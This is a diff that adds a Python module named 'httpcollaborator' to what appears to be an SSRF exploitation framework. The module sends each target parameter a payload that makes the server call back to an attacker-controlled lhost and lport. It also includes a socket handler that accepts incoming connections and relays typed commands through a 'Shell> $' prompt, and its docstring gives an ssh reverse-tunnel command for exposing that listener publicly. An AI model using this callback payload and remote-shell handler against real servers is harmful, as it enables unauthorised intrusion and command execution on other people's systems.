|
| 1 | +from utils.utils import * |
| 2 | +import re |
| 3 | +import threading |
| 4 | +import logging |
| 5 | +import urllib.parse |
| 6 | + |
| 7 | +""" |
| 8 | +Example: |
| 9 | +``` |
| 10 | +~$ python3 ssrf-exploit.py -v -u url --lhost=public-ip --lport 4242 -m httpcollaborator -l http |
| 11 | +``` |
| 12 | +Use ssh/autossh to established remote tunnel between public and localhost handler if running module locally against remote target |
| 13 | +``` |
| 14 | +~$ ssh -fN -R public-ip:4242:127.0.0.1:4242 username@public-ip |
| 15 | +``` |
| 16 | +""" |
| 17 | + |
| 18 | +name = "httpcollaborator" |
| 19 | +description = "This module act like burpsuite collaborator through http protocol to detect if target parameters are prone to ssrf" |
| 20 | +author = "errorfiathck" |
| 21 | +documentation = [] |
| 22 | + |
| 23 | +class Handler(threading.Thread): |
| 24 | + |
| 25 | + def __init__(self, port): |
| 26 | + threading.Thread.__init__(self) |
| 27 | + logging.info(f"Handler listening on 0.0.0.0:{port}") |
| 28 | + self.connected = False |
| 29 | + self.port = int(port) |
| 30 | + |
| 31 | + def run(self): |
| 32 | + self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| 33 | + self.socket.bind(('', self.port)) |
| 34 | + |
| 35 | + while True: |
| 36 | + self.socket.listen(5) |
| 37 | + self.client, address = self.socket.accept() |
| 38 | + print(f"Handler> New session from {address[0]}") |
| 39 | + self.connected = True |
| 40 | + |
| 41 | + response = self.client.recv(255) |
| 42 | + while response != b"": |
| 43 | + print(f"\n{response.decode('utf_8', 'ignore').strip()}\nShell > $ ", end='') |
| 44 | + response = self.client.recv(255) |
| 45 | + |
| 46 | + def listen_command(self): |
| 47 | + if self.connected == True: |
| 48 | + cmd = input("Shell> $ ") |
| 49 | + if cmd == "exit": |
| 50 | + self.kill() |
| 51 | + print("BYE !") |
| 52 | + exit() |
| 53 | + self.send_command(cmd+"\n\n") |
| 54 | + |
| 55 | + def send_command(self, cmd): |
| 56 | + self.client.sendall(cmd.encode()) |
| 57 | + |
| 58 | + def kill(self): |
| 59 | + self.client.close() |
| 60 | + self.socket.close() |
| 61 | + |
| 62 | + |
| 63 | +class exploit(): |
| 64 | + SERVER_HOST = "127.0.0.1" |
| 65 | + SERVER_PORT = "4242" |
| 66 | + |
| 67 | + def __init__(self, requester, args): |
| 68 | + logging.info(f"Module '{name}' launched !") |
| 69 | + |
| 70 | + # Handle args for httpcollaborator |
| 71 | + if args.lhost == None: self.SERVER_HOST = input("Server Host:") |
| 72 | + else: self.SERVER_HOST = args.lhost |
| 73 | + |
| 74 | + if args.lport == None: self.SERVER_PORT = input("Server Port:") |
| 75 | + else: self.SERVER_PORT = args.lport |
| 76 | + |
| 77 | + params = args.param.split(",") |
| 78 | + for param in params: |
| 79 | + logging.info(f"Testing PARAM: {param}") |
| 80 | + payload = wrapper_http(f"?{param}", args.lhost, args.lport.strip() ) |
| 81 | + r = requester.do_request(param, payload) |
| 82 | + |
| 83 | + logging.info(f"Module '{name}' finished !") |
0 commit comments